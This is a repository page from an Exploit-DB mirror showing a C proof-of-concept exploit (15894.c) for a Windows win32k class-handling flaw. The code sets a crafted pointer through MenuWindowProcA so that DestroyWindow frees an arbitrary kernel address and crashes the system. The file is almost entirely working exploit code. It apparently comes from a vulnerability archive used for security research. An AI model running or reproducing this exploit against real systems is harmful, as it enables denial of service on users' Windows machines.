bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/15894.c
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

38 lines
No EOL
846 B
C
Raw Blame History

#include <windows.h>
/*
Source:
http://mista.nu/blog/2010/12/01/windows-class-handling-gone-wrong/
*/
int main(int argc, char **argv)
{
WNDCLASSA Class = {0};
CREATESTRUCTA Cs = {0};
FARPROC MenuWindowProcA;
HMODULE hModule;
HWND hWindow;
Class.lpfnWndProc = DefWindowProc;
Class.lpszClassName = "Class";
Class.cbWndExtra = sizeof(PVOID);
RegisterClassA(&Class);
hModule = LoadLibraryA("USER32.DLL");
MenuWindowProcA = GetProcAddress(hModule,"MenuWindowProcA");
hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);
// set the pointer value of the (soon to be) popup menu structure
SetWindowLongPtr(hWindow,0,(LONG_PTR)0x80808080);
// set WND->fnid = FNID_MENU
MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);
// trigger -> ExPoolFree(0x80808080)
DestroyWindow(hWindow);
return 0;
}
Reference in a new issue View git blame Copy permalink